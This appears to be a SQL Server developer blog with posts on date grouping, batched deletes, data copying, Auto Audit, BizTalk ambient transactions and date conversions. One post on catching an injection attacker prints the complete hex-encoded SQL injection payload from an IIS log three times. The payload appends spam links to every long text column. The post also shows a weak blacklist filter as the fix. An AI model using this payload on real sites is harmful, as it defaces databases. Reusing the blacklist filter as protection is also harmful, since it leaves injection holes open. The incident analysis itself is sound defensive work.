In Microsoft SQL, how can we group by a date, when the column we want to group by is a date time?
For example, you want the number of rows created for each date, and you have a column in the database called Date_Added (or in my example below, TrcDateTime).

Code Sample 1:

select DATEADD(dd, 0, DATEDIFF(dd, 0, trcDateTime)) as Date, 
       count(*) as count 
from trace 
GROUP BY DATEADD(dd, 0, DATEDIFF(dd, 0, trcDateTime))

Output 1:

The above gives the correct counts, but gives a rather  ugly Date, because it shows the time as 00:00:00.00.0000. To remove that, we can convert the date to a string.

Code Sample 1:

select LEFT(CONVERT(VARCHAR, DATEADD(dd, 0, DATEDIFF(dd, 0, trcDateTime)), 120), 10)  as Date, 
       count(*) as count
from trace
GROUP BY DATEADD(dd, 0, DATEDIFF(dd, 0, trcDateTime))

Output 2:

This is how you can convert a DateTime to a String:

LEFT(CONVERT(VARCHAR, trcDateTime, 120), 10)

I took the entire expression from the first query: DATEADD(dd, 0, DATEDIFF(dd, 0, trcDateTime))
and substituted it where the italic trcDateTime was in the expression above.




I have a SQL/Trace, and it’s a requirement to each night delete all rows in the Trace over x days old. This is typically called a purge program, or mass delete. If you don’t limit the data, then you can knock the lights out of SQL.

Below is a modification to code I found here: That blog does a good job of explaining why we need to break the deletes into smaller chunks.

I added the “Wait” statement, which is optional. If you have other jobs running that might be impacted by your delete, you don’t want to block them. So you simply pause, give them a chance to get in and out, then continue with the deletes.

-- Technique to not cause SQL slowness by deleting large number of rows (such as millions of rows) 
-- at one time (without freeing locks) 
-- from

declare @DaysToKeep int = 5
declare @RowsDeleted int = 1  -- must set > 0 so the loop will be entered the first time through 
declare @TotalRowsDeleted int = 0 
declare @StartDateTime datetime = DATEADD(d, -@DaysToKeep, getdate())

WHILE @RowsDeleted > 0
         DELETE TOP (1000) FROM Trace where  trcDateTime <= @StartDateTime 
         set @RowsDeleted = @@ROWCOUNT 
         print @RowsDeleted
         set @TotalRowsDeleted = @TotalRowsDeleted + @RowsDeleted 
         WAITFOR DELAY '00:00:01';  -- Give SQL a little break 
SELECT @StartDateTime as StartDateTimeOfDelete, 
       @TotalRowsDeleted as RowsDeleted, (select COUNT(*) from Trace) as RemainingRows, 
       MIN(trcDateTime) as Min, MAX(trcDateTime) as Max from Trace  

--select count(*) from trace where trcDateTime >= DATEADD(d, -15, getdate())
--declare @DaysToKeep int = 20
--select DATEADD(d, -@DaysToKeep, getdate())

Suppose you have a large list of items that you want to put into a SQL in list statement, like this:

where firstname in (

But the data you have in is Excel or a text file, and doesn’t have the quotes and commas around it.

You can quickly modify the data using the RegEx Replace All feature of NotePad++.

Data to change and the Replace Commands



Data to be changed, and then do CNTL-H or Search/Replace… from the top menu.


This is what it means.  The “Find What” is set to (.*).  That means find all characters on each line, and capture it. The parentheses are the capture symbols, everything between them is captured.  The Dot means any-character, and the * means 0 or more of those characters.

The “Replace with” is set to ‘\1’.  The backslash-one refers to the first capture in parentheses from the “Find what” box above.  Then the other symbols happen to be what I wanted to add, a single-quote at the beginning, and a single-quote at the end.



Results - After the Replace

Results – After the Replace


where firstname in (

The only issue is the last name in the list will also have a comma after it.  You will just have to change that manually.  (I.e. remove the comma after “Abe” above).


From time to time, I need to transfer data from one database to another. RedGate Data Compare is my to tool of choice, but not all clients have a license for it ($495 for SQL Data Compare, $1795 for the Developer Suite). I also like SQL Database Compare if I need to sync DDL (tables, indexes, constraints, stored procs, functions, etc…) from one system and the other.

The other day, as a BizTalk developer, I had to copy a lookup table from one system to an existing database on another system.  So I couldn’t just backup/restore the file.  I tried some of the tools in SQL, which I must admit I don’t use often, and I was getting a connectivity issue; maybe the firewalls between or DMZ (not 100% sure).

Years ago, I remember a nice C# WinForm program that allowed you to enter a SQL statement, then would generate SQL Insert Statements from it.  I was having trouble finding it, but found two other alternatives.

Solution #1 – All SQL – Generating SQL Statements in SQL Server – I like this one because it was all written in T-SQL.  The site provides a StoredProc that you add to your database and execute with a table name. You turn off grid mode, i.e. put your output in text mode, and save or copy/paste the results less the header.  This allowed me to get done what I needed this week in just about 10 minutes.  I just took the generated SQL statements, copied them to the other server, and ran them in SSMS.  To run it, you just run the stored proc and pass the table name:

exec InsertGenerator MyTableName

Out of the box, it doesn’t give you the ability to select a subset of rows with a where clause.

Solution #2 – C# – Generating SQL Statements in C# – This one is a C# solution if your prefer that language.  It’s a console program, so no WinForm/GUI.  I didn’t actually try this one.  I’m still hoping to find the GUI version that I found a few years ago.  I think it was on CodeProject as well.

In my case, it was a code lookup table used by a BizTalk map.  I took the insert statements as well as the create table statement, and added to the BizTalk project (in a “doc” or “prereqs” subfolder so future developers on different environments would be able to load up the table quickly. You can include other files such as .sql or .txt into a BizTalk project, but they are not compiled of course.  That way, they are checked into your source code repository.

Below is an example of a RedGate Data Compare.  You can specify two databases, then it shows you the tables. You can select all tables or individual select the tables you want to compare.  It then compares the rows of those tables.  However, note that the table has to exist on both databases for it to compare the table and generate SQL Insert Statements.  SQL Database Compare will help you to sync up the tables.

RedGate SQL Data Compare

RedGate SQL Data Compare

This is how I found a SQL Injection Hacker who was changing all the product titles in my custom shopping cart using a diabolical injection technique. First, I knew the problem was happening, because I saw HTML inserted into my product titles and product descriptions of my database and website. My application was written in “Classic ASP” and VBScript, before .NET came out; since I have hundreds of scripts, I never rewrote them for .NET.

Protecting my Data and Setting the Trap

First of all, I added a T-SQL trigger to disallow multiple record updates, and write to a log file when the code is triggered.

ALTER TRIGGER [dbo].[myTable_multiUpdatePrevention]
ON [dbo].[myTable]
DECLARE @Count int
DECLARE @MaxAllowedRowToChange int = 5
Select @Count = count(*) from Inserted

IF @Count > @MaxAllowedRowToChange

— Log the issue to the table called ‘Log’


declare @Message varchar(500)
set @Message = ‘Trigger: Possible Hack: Multiple update attempt: Table=Product rowCount=’ + convert(varchar(10),@Count)
insert into LogHacks (logmessage,logdatetime, logUserid) Values (@Message,getdate(), SYSTEM_USER)

RAISERROR(‘Cannot update more than x rows of Product table without disabling trigger ‘,16,1)


Install Auditing Software

I installed “Auto Audit” from Codeplex, see my prior blog on this great tool.

Look at IIS Log

Based on the above, I monitored the LogHacks table, and now can see when the attack is happening, and also now I’m protected and don’t have to restore my data anymore. I was able to capture the userid, which narrowed it down to one of my classic ASP pages.

I then went to my IIS log, and looked the pages retrieved or posted nearest to that time. I found this:

2015-03-05 15:17:57 GET /MyDir/MyCatalog.asp brand=1'+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b275d292b27273c2f7469746c653e3c7374796c653e2e617271687b706f736974696f6e3a6162736f6c7574653b636c69703a726563742834303070782c6175746f2c6175746f2c3432347078293b7d3c2f7374796c653e3c64697620636c6173733d617271683e3c6120687265663d687474703a2f2f67656e657269636369616c6973617375692e636f6d203e6368656170206369616c69732067656e65726963206f6e6c696e653c2f613e3c2f6469763e2727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(@s)-- 80 - Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1)'+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b275d292b27273c2f7469746c653e3c7374796c653e2e617271687b706f736974696f6e3a6162736f6c7574653b636c69703a726563742834303070782c6175746f2c6175746f2c3432347078293b7d3c2f7374796c653e3c64697620636c6173733d617271683e3c6120687265663d687474703a2f2f67656e657269636369616c6973617375692e636f6d203e6368656170206369616c69732067656e65726963206f6e6c696e653c2f613e3c2f6469763e2727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(@s)-- 200 0 64 1781

At first, I was being narrow minded, and though injection was only happening in web page forms.
I hadn’t thought about query strings on the URL itself!

Just to find out how this amazingly clever piece of code works, I did the following:

Captured SQL Generated fom my ASP Program

Below, you can see that they they took my “like” clause, and hijacked it, by closing it with a single quote, then adding their own statements.

SQL=Select * from myView where abc_title like '%language series%'  and abc_title like '%1' declare @s varchar(8000) set @s=cast(0x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b275d292b27273c2f7469746c653e3c7374796c653e2e617271687b706f736974696f6e3a6162736f6c7574653b636c69703a726563742834303070782c6175746f2c6175746f2c3432347078293b7d3c2f7374796c653e3c64697620636c6173733d617271683e3c6120687265663d687474703a2f2f67656e657269636369616c6973617375692e636f6d203e6368656170206369616c69732067656e65726963206f6e6c696e653c2f613e3c2f6469763e2727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72 as varchar(8000)) exec(@s)%' and prod_yn_visible = 'Y' order by prod_priority_sort desc, prod_code

Unscramble the Hex Code

To interpret the above mess, I wrote this little T-SQL Script (note, I copied the entire hex string, but below I put … so as not to repeat it again here:

declare @showvar varchar(8000)
set @showvar = cast(0x73...36f72 as varchar(8000))
print @showvar

Looking at the Hacker’s Actual Code

When I ran the above code, the actual SQL is shown (line breaks added to make it readable):

set ansi_warnings off
where c.DATA_TYPE in ('nvarchar','varchar','ntext','text')
and c.CHARACTER_MAXIMUM_LENGTH>80 and t.table_name=c.table_name
and t.table_type='BASE TABLE'

OPEN Table_Cursor
SET [‘+@C+’]=CONVERT(VARCHAR(8000),[‘+@C+’])+”

” ‘)
CLOSE Table_Cursor

I must admit this is some clever code, and illustrates what hackers will do to sell generic drugs for “you know what”. When I went to their site, my Malware plug-i told me it wasn’t safe, so I didn’t actually load their pages.

The code is basically looking for all super-long text fields, anything over 80 characters in length. It does that by searching INFORMATION_SCHEMA.tables peaking at all my tables and columns. The goal of the attack is apparently to just append their code HTML code, and let your site keep working, so that for many days, they get the SEO impact of the extra link-backs, until you discover the issue. However, in some cases, the HTML was not closing properly, and made a mess of some of my web pages.

Finding my injection bug

I found that I was stringing together a complex where clause depending on various factors. So moral of the story is, never take anything directly form the URL! Request(“language”) is pulling a language variable from the URL So they basically set language to close off the like wild card, then put their own code after that…

optionalSelection = " and prod_title like '%" & Request("language") & "%'"

Fixing my injection bug

optionalSelection = " and prod_title like '%" & fixSqlInsertion(Request("language")) & "%'"

function fixSqlInsertion(stringin)
temp1 = replace(stringin,”‘”,””)
temp1 = replace(temp1,”;”,””)
temp1 = replace(temp1,”,”,””)
temp1 = replace(temp1,”>”,””)
temp1 = replace(temp1,”<“,””)
temp1 = replace(temp1,”=”,””)
temp1 = replace(temp1,”@”,””)
temp1 = replace(lcase(temp1),”delete”,”nodelete”)
temp1 = replace(lcase(temp1),”drop”,”nodrop”)
fixSqlInsertion = temp1
end function

The above is not super-elegant; it results in a “500 Sever Error” to the caller, but I don’t care what the hacker sees really. If he sees the 500, maybe he will quit visiting my site. This was the fastest fix, not the most effective. The better technique would probably be to create a stored procedure, and pass parms to it. Another technique I could use is to limit the size of the URL to a maximum length, to avoid long chunks of code like the one above.

The code above just removes the characters that a SQL injection would need to do damage. To be valid T-SQL, you need to use @ sign for variables, and you need quote marks and equal signs. Doing a DELETE or a DROP doesn’t require all that punctuation, so I prohibit those words; and substitute some fake word that will cause the SQL to fail.

There are two other ideas I could make use of to improve my code more:

1) Parameterized queries
2) Just make sure a SQL select statement doesn’t contain the words “Update”, “Delete”, “Drop”, “Alter”, etc… A select should just be a select.

Here are some references to other resources on fixing SQL Injection Hacks.  Some are for PHP, but PHP is very similar conceptually to VBScript and Classic ASP that I was using.  You might want to do further searches for you particular programming language.
4. – Good intro to SQL Injection on Wikipedia



T-SQL Error

IDENTITY_INSERT is already ON for table schema.SomeTableName. Cannot perform SET operation for table Table Name.


At any time, only one table in a session can have the IDENTITY_INSERT property set to ON.  So when you try to set it ON for another table, without turning if off for the first table, this error is generated.

Enter this command for the first table mentioned in the above error.

SET IDENTITY_INSERT [yourSchema].[yourTable] OFF


This happened to me when moving data from one SQL Server to another using RedGate synchronization script.  The script was too large to run all at once; so I had to cut it into smaller pieces.  That utility turns off IDENTITY_INSERT before each set of inserts for each table, then turns it back on at the end of those inserts.



A few years ago I discovered a great utility called “Auto Audit” on CodePlex by Paul Nielson and John Sigouin. The best thing is that it creates triggers that audit insert, update, and deletes on any desired table. It creates a global audit table, and creates triggers specific to each of your tables.  It can optionally add these columns to each table: CreatedDate, CreatedBy, ModifiedDate, ModifiedBy, and RowVersion (incrementing INT).  It includes views to see your audits, and it does add eight of its own tables to your database (all nicely put in the ‘Audit’ schema).  It also logs who is doing DDL commands, so you know, for example, which DBA or which developer, added some column to some schema.

It’s like a mini-framework to make sure all your triggers and auditing are done in a consistent manner, and it writes all the tedious trigger code for you. This of course allows you to see who changed what and when. The other benefit is that it standardizes the process, and builds the trigger for you. I’ve been in other companies where we had similar functionality, but it was all hand-coded, and rather tedious to create and update the triggers.

When you download it, what you get is just one big .sql file, 6422 lines long.  You run that script in each database in which you want to use Auto Audit.


I had a database called NealDemo with one table dbo.Employee (in red box below).  Running the Auto Audit script added 8 of it’s own tables, but as of yet, it does not touch the Employee table.  We have to do the next step for that to happen.


Running the above will also create some stored procedures, views, and most importantly SchemaAuditDDLTrigger DDL Trigger.  This will allow you to see who for instance modified a table structure, because that will get audited too.

 Turning On Audit for a Table


So to turn on auditing for one single table, you do this (overriding the schema or other parms as desired):

exec [Audit].[pAutoAudit] @TableName=’Employee’, @BaseTableDDL=1

Note: If you don’t specify @BaseTableDDL=1, the 5 columns won’t get added to the table.  Below is an example of my employee table, and it’s fairly obvious which 5 columns were added.

If you are ready to turn it on everywhere, on all tables, instead use pAutoAuditAll.


It created three triggers on my Employee table.  The update trigger alone is 305 lines of code, and the other two are about 150 lines each.


Viewing the Audits

I ran the following update:


Rather than creating one audit table for each table, Auto Audit uses one consolidated audit table:



However, it does create a view for each table.  In addition it creates a view called Employee_Deleted to show any rows deleted from my Employee table..


Now look what happens when you “Alter” a table.  There is a Database Trigger called “SchemaAuditDDLTrigger”. It catches the changes and logs them, as well as rebuilds the triggers on the Employee table.

Table Function

There’s also a table function that can be used on a single key.  Below I show the differnce in the vAuditAll and using the function against that same key:



Auditing DDL Changes

Now look what happens when you “Alter” a table.  There is a Database Trigger called “SchemaAuditDDLTrigger”. It catches the changes and logs them, as well as rebuilds the triggers on the Employee table.


To view who changed the table or anything in the schema using DDL, check the Audit.SchemaAudit table:




I’m so impressed with this utility.  If you have no auditing at all on your database, you can turn this on in just a matter of minutes.  Note however, that it could impact your performance, so be sure to benchmark if you are pushing the boundaries on performance already.



One day, I hope to be able to fully understand and explain the “Ambient Transaction” true/false option in BizTalk WCF-SQL and WCF-Custom send and receive ports.  Until then, I’m going to collect the most relevant info and blogs here:

The official Microsoft BizTalk parameter definition (for the WCF Send or Receive Port):

Specifies whether the SQL adapter performs the operations using the transactional context provided by the caller. Default is true, which means that the adapter always performs the operations in a transactional context. If there are other resources participating in the transaction, and SQL Server also joins the transaction, the transaction gets elevated to an MSDTC transaction.

However, there can be scenarios where you do not want the adapter to perform operations in a transactional context. For example:

  • While performing a simple Select operation on a SQL Server database
  • While specifying a polling statement that performs a Select operation, and does not involve any changes to the table either through a Delete statement or by invoking a stored procedure.

Both these operations do not make any updates to the database table and, hence, elevating these operations to use an MSDTC transaction can be a performance overhead. In such scenarios, you can set the binding property to false so that the SQL adapter does not perform the operations in a transactional context.

Not performing operations in a transactional context is advisable only for operations that do not make changes to the database. For operations that update data in the database, we recommend setting the binding property to true; otherwise you might either experience message loss or duplicate messages, depending on whether you are performing inbound or outbound operations.  (Richard Seroter – usually has great blogs on BizTalk topics) (Richard Seroter above refers to the “Ambient Transaction” feature as being part of the Systems.Transaction in .NET Framework 2.0 and afterwards.  It seems like understanding Ambient Transactions from native C# first would be key to understanding how it works in BizTalk.

The above link provides the following information, but as for me now, it does not pass the “so what” and the “WIIFM” (What’s In It for Me) test.

System.Transactions defines a concept called an ambient transaction. The ambient transaction is the transaction that is present in the thread that the current application code is executing within. To obtain a reference to the ambient transaction call the static Current property of Transaction:

<em>Transaction ambientTransaction = Transaction.Current;</em>

If there is no ambient transaction, Current will return null.

The ambient transaction object is stored in the thread local storage (TLS). As a result, when the thread winds its way across multiple objects and methods, all objects and methods can access their ambient transaction.

Later it says:

The value of TransactionScopeOption lets you control whether the scope takes part in a transaction, and if so, whether it will join the ambient transaction or become the root scope of a new transaction.


A TransactionScope object has three options:

  • Join the ambient transaction.
  • Be a new scope root, that is, start a new transaction and have that transaction be the new ambient transaction inside its own scope.
  • Do not take part in a transaction at all.


This forum post tries to answer the question: “What exactly is an ambient transaction?”



There are 2 main kinds of transactions; connection transactions and ambient transactions. A connection transaction (such as SqlTransaction) is tied directly to the db connection (such as SqlConnection), which means that you have to keep passing the connection around – OK in some cases, but doesn’t allow “create/use/release” usage, and doesn’t allow cross-db work.

The alternative is an ambient transaction; new in .NET 2.0, the TransactionScope object (System.Transactions.dll) allows use over a range of operations (suitable providers will automatically enlist in the ambient transaction). This makes it easy to retro-fit into existing (non-transactional) code, and to talk to multiple providers (although DTC will get involved if you talk to more than one).

Note here that the two methods can handle their own connections (open/use/close/dispose), yet they will silently become part of the ambient transaction without us having to pass anything in.

If your code errors, Dispose() will be called without Complete(), so it will be rolled back. The expected nesting etc is supported, although you can’t roll-back an inner transaction yet complete the outer transaction: if anybody is unhappy, the transaction is aborted.

The other advantage of TransactionScope is that it isn’t tied just to databases; any transaction-aware provider can use it. WCF, for example. Or there are even some TransactionScope-compatible object models around (i.e. .NET classes with rollback capability – perhaps easier than a memento, although I’ve never used this approach myself).


Blog on on the topic:  Transaction.Current and Ambient Transactions by Florin Lazar:

Key phrase from above blog: “Transaction.Current can detect that the transaction was created inside a COM+ context and provide it to anyone asking for the ambient transaction.

StackOverflow: Difference Between Transaction and TransactionScope

Key phrase: The ambient transaction is the transaction within which your code executes.

Transaction Scope Class (C# examples):

And final link – to a comparison of Transaction Handling in 1.0 and 2.0 .NET (rather old, but may help give the background of when the “Ambient Transaction” was birthed:

CodeProject Sample Demo/Code:

A transaction which automatically identifies a code block that needs to support a transaction without explicitly mentioning any transaction related things. An ambient transaction is not tied just to a database, any transaction aware provider can be used. TransactionScope implements an ambient transaction. If you see the use of TransactionScope, you will not find transaction related anything sent to any method or setting any property. A code block is automatically attached with the transaction if that code is in any TransactionScope. A WCF transaction is another example of a transaction aware provider. Any one can write a transaction aware provider like the WCF implementation.



WCF-SQL and DTC Ambient Transactions in a cross domain scenario

The ambient transaction option ensures that the BizTalk adapter flows a transaction through to SQL Server and thus the SQL transaction will only commit when the message received by BizTalk is successfully written to the BizTalk message box database.  This is of course crucial in a guaranteed delivery based solution where you can’t afford to lose any messages.

I found that all worked well when ambient transactions were turned off, however when turned on it looked like the receive location just hangs, holding a lock on SQL resources (I tried to do a select on the table in question using SQL Server Management Studio and it couldn’t return any values due to locks being in place) which won’t be removed until the host instance is reset.

The above blog talks about using DTCPing and DTCTester to identify DTC issues, and fixing them by laxing the security options in the DTC configuration.

Conclusions (or lack thereof):

So for now, I suggest studying that second web page to get an idea of what the topic is really about.  If I had time, I would write some C# programs to test outside of BizTalk.


— MSSQL Server string to date conversion – datetime string format sql server
— MSSQL string to datetime conversion – convert char to date sql server

SELECT convert(datetime, ‘Oct 23 2012 11:01AM’, 100) — mon dd yyyy hh:mmAM (or PM)

SELECT convert(datetime, ‘Oct 23 2012 11:01AM’) — 2012-10-23 11:01:00.000

— Without century (yy) string date conversion – convert string to datetime

SELECT convert(datetime, ‘Oct 23 12 11:01AM’, 0) — mon dd yy hh:mmAM (or PM)

SELECT convert(datetime, ‘Oct 23 12 11:01AM’) — 2012-10-23 11:01:00.000

— Convert string to datetime sql – convert string to date sql – sql dates format

— T-SQL convert string to datetime – SQL Server convert string to date

SELECT convert(datetime, ’10/23/2016′, 101) — mm/dd/yyyy

SELECT convert(datetime, ‘2016.10.23’, 102) —

SELECT convert(datetime, ’23/10/2016′, 103) — dd/mm/yyyy

SELECT convert(datetime, ‘23.10.2016’, 104) —

SELECT convert(datetime, ’23-10-2016′, 105) — dd-mm-yyyy

— mon types are nondeterministic conversions, dependent on language setting

SELECT convert(datetime, ’23 OCT 2016′, 106) — dd mon yyyy

SELECT convert(datetime, ‘Oct 23, 2016′, 107) — mon dd, yyyy

— 2016-10-23 00:00:00.000

SELECT convert(datetime, ’20:10:44’, 108) — hh:mm:ss

— 1900-01-01 20:10:44.000

— mon dd yyyy hh:mm:ss:mmmAM (or PM) – sql time format

SELECT convert(datetime, ‘Oct 23 2016 11:02:44:013AM’, 109)

— 2016-10-23 11:02:44.013

SELECT convert(datetime, ’10-23-2016′, 110) — mm-dd-yyyy

SELECT convert(datetime, ‘2016/10/23’, 111) — yyyy/mm/dd

SELECT convert(datetime, ‘20161023’, 112) — yyyymmdd

— 2016-10-23 00:00:00.000

SELECT convert(datetime, ’23 Oct 2016 11:02:07:577′, 113) — dd mon yyyy hh:mm:ss:mmm

— 2016-10-23 11:02:07.577

SELECT convert(datetime, ’20:10:25:300′, 114) — hh:mm:ss:mmm(24h)

— 1900-01-01 20:10:25.300

SELECT convert(datetime, ‘2016-10-23 20:44:11’, 120) — yyyy-mm-dd hh:mm:ss(24h)

— 2016-10-23 20:44:11.000

SELECT convert(datetime, ‘2016-10-23 20:44:11.500’, 121) — yyyy-mm-dd hh:mm:ss.mmm

— 2016-10-23 20:44:11.500

SELECT convert(datetime, ‘2008-10-23T18:52:47.513’, 126) — yyyy-mm-ddThh:mm:ss.mmm

— 2008-10-23 18:52:47.513

— Convert DDMMYYYY format to datetime

SELECT convert(datetime, STUFF(STUFF(‘31012016′,3,0,’-‘),6,0,’-‘), 105)

— 2016-01-31 00:00:00.000

— SQL string to datetime conversion without century – some exceptions

SELECT convert(datetime, ’10/23/16’, 1) — mm/dd/yy

SELECT convert(datetime, ‘16.10.23’, 2) —

SELECT convert(datetime, ’23/10/16′, 3) — dd/mm/yy

SELECT convert(datetime, ‘23.10.16’, 4) —

SELECT convert(datetime, ’23-10-16′, 5) — dd-mm-yy

SELECT convert(datetime, ’23 OCT 16′, 6) — dd mon yy

SELECT convert(datetime, ‘Oct 23, 16′, 7) — mon dd, yy

SELECT convert(datetime, ’20:10:44’, 8) — hh:mm:ss

SELECT convert(datetime, ‘Oct 23 16 11:02:44:013AM’, 9)

SELECT convert(datetime, ’10-23-16′, 10) — mm-dd-yy

SELECT convert(datetime, ’16/10/23′, 11) — yy/mm/dd

SELECT convert(datetime, ‘161023’, 12) — yymmdd

SELECT convert(datetime, ’23 Oct 16 11:02:07:577′, 13) — dd mon yy hh:mm:ss:mmm

SELECT convert(datetime, ’20:10:25:300′, 14) — hh:mm:ss:mmm(24h)

SELECT convert(datetime, ‘2016-10-23 20:44:11’,20) — yyyy-mm-dd hh:mm:ss(24h)

SELECT convert(datetime, ‘2016-10-23 20:44:11.500’, 21) — yyyy-mm-dd hh:mm:ss.mmm

We have one table with about 120 columns in it. I was just curious what the average row size was, and found this slick solution:

Use DBCC to find the “Average Size of a Row”


dbcc showcontig (‘your_table_name‘) with tableresults

My tablename=’Transaction’, so substitute your tablename there.


dbcc showcontig (‘Transaction’) with tableresults

average row size


average row size

Useful columns in the result are: AverageRecordSize, MinimumRecordSize, MaximumRecordSize